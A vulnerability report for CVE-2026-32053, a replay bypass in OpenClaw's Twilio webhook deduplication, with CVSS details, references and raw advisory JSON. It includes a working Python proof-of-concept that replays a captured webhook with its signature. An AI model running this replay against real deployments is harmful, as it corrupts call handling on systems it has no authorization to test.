Security Vulnerability Report
CVE-2026-32053 CVSS 6.5 MEDIUM


Published: 2026-03-21 01:17:09
Last Modified: 2026-03-24 21:15:39

Description

OpenClaw versions prior to 2026.2.23 contain a vulnerability in Twilio webhook event deduplication where normalized event IDs are randomized per parse, allowing replay events to bypass manager dedupe checks. Attackers can replay Twilio webhook events to trigger duplicate or stale call-state transitions, potentially causing incorrect call handling and state corruption.

CVSS Details

CVSS v3.1 Score (primary and secondary source agree)
6.5
Severity
MEDIUM
CVSS v3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
CVSS v4.0 Score (secondary source)
6.9 MEDIUM
CVSS v4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N
Weakness
CWE-294 (Authentication Bypass by Capture-replay)

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time

import requests

# Target URL (placeholder; the Twilio webhook route is deployment-specific)
url = "http://target-openclaw-server/webhook/twilio"

# Sample Twilio webhook payload captured from the network. The replay must be
# byte-for-byte the captured body: what is bypassed is the dedupe key, so any
# change to the body would simply make this a different event.
payload = {
    "CallSid": "CA1234567890ABCDE",
    "From": "+1234567890",
    "To": "+0987654321",
    "CallStatus": "ringing",
    "CallerName": "Attacker",
}

# If the target validates X-Twilio-Signature, reuse the value captured with
# the original delivery. Twilio's signature covers the request URL and the
# form fields, so an unmodified replay to the same URL carries a signature
# that still verifies. The placeholder below stands for that captured value.
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Twilio-Signature": "<X-Twilio-Signature captured with the original request>",
}

print("[+] Sending initial webhook request...")
r1 = requests.post(url, data=payload, headers=headers)
print(f"Status Code: {r1.status_code}")

print("[+] Waiting 2 seconds...")
time.sleep(2)

print("[+] Replaying the same webhook request (Replay Attack)...")
# Because the normalized event ID is randomized per parse, the replay is
# assigned a fresh ID and the manager does not recognize it as a duplicate.
r2 = requests.post(url, data=payload, headers=headers)
print(f"Status Code: {r2.status_code}")

# An HTTP 200 only shows the request was accepted at the transport level.
# Confirm duplicate processing by observing a repeated or stale call-state
# transition for this CallSid in the target's logs or call state.
if r2.status_code == 200:
    print("[!] Replay accepted (HTTP 200); check call state for a duplicate transition.")
else:
    print("[-] Replay rejected.")

References

https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7 (Vendor Advisory, Mitigation)
https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32053",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-21T01:17:08.503",
    "lastModified": "2026-03-24T21:15:38.733",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenClaw versions prior to 2026.2.23 contain a vulnerability in Twilio webhook event deduplication where normalized event IDs are randomized per parse, allowing replay events to bypass manager dedupe checks. Attackers can replay Twilio webhook events to trigger duplicate or stale call-state transitions, potentially causing incorrect call handling and state corruption."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-294" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "2026.2.23",
                "matchCriteriaId": "19EDA1E2-F0D6-44F4-A333-C32DCE286DA6"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openclaw/openclaw/commit/1d28da55a5d0ff409e34999e0961157e9db0a2ab",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqx8-9xxw-f2m7",
        "source": "[email protected]",
        "tags": ["Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/openclaw-twilio-webhook-replay-bypass-via-randomized-event-id-normalization",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}